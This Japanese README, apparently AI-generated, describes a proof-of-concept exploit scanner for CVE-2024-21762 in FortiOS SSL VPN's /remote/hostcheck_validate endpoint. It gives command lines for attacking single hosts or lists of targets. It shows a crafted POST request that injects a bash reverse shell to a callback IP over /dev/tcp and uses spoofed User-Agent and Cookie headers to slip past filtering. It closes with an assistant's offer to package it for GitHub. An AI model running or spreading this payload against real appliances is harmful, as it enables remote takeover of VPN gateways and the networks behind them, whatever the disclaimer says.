
FortiOS SSL VPN の /remote/hostcheck_validate エンドポイントを標的とし、リバースシェルペイロードを配信する CVE-2024-21762 向け概念実証 (PoC) スキャナ。
FortiOS SSL VPN の /remote/hostcheck_validate エンドポイントの CVE-2024-21762 を標的とし、リバースシェルペイロードを配信する Proof-of-Concept スキャナ。
こちらは、プロジェクト用のGitHub スタイルの解説記事です。簡潔で明瞭なサマリー、使用方法ガイド、そして CVE との関連性に関する文脈が含まれています。
CVE-2024-21762 FortiOS HostCheck PoC ScannerFortiOS SSL VPN の
/remote/hostcheck_validateエンドポイントの CVE-2024-21762 を標的とし、リバースシェルペイロードを配信する Proof-of-Concept スキャナ。
この Python スクリプトは、Fortinet の FortiOS SSL VPN インターフェースと対話するように設計された PoC(Proof of Concept)ツールで、/remote/hostcheck_validate エンドポイントのCVE-2024-21762(スタックベースのバッファオーバーフローまたはコマンドインジェクションの脆弱性)を標的としています。
免責事項: これは教育目的および許可を得たテスト目的のみで使用してください。
/remote/hostcheck_validate に細工した POST リクエストを送信します。host)にbash リバースシェルペイロードを注入します。User-Agent、Cookie)を使用して、FortiOS の表面的なリクエストフィルタリングを回避します。last_response.txt)tqdm依存関係をインストール:
pip install tqdm
python3 exploit.py --target 192.168.1.1:443 --callback-ip YOUR_IP --callback-port 8080
python3 exploit.py --input targets.txt --output results.txt --callback-ip YOUR_IP --callback-port 8080
targets.txt: IP:PORT 形式のターゲットリスト(1 行に 1 つ)results.txt: エクスプロイト試行の出力ログPOST /remote/hostcheck_validate HTTP/1.1
Host: [target]
User-Agent: FortiSSLVPNClient/6.4.0
Cookie: SVPNCOOKIE=AAAA
Content-Type: application/x-www-form-urlencoded
host=bash -c 'bash -i >& /dev/tcp/[callback-ip]/[callback-port] 0>&1'&...
このツールは、各試行の完全な HTTP 応答を次のファイルに書き込みます:
last_response.txt
これを使用して、リクエストが解析されたか、拒否されたか、エラーコードが返されたかを確認します。
このコードは教育目的および許可を得たテスト目的のみで提供されます。所有していない、または明示的なテスト許可を得ていないネットワークやシステムでは使用しないでください。
Carter — サイバーセキュリティエンジニア、Red/Purple Team 愛好家、PoC 自動化オタク。
これを GitHub にプッシュできる README.md ファイル+リポジトリ構成にパッケージ化しますか? 次にそれを生成できます。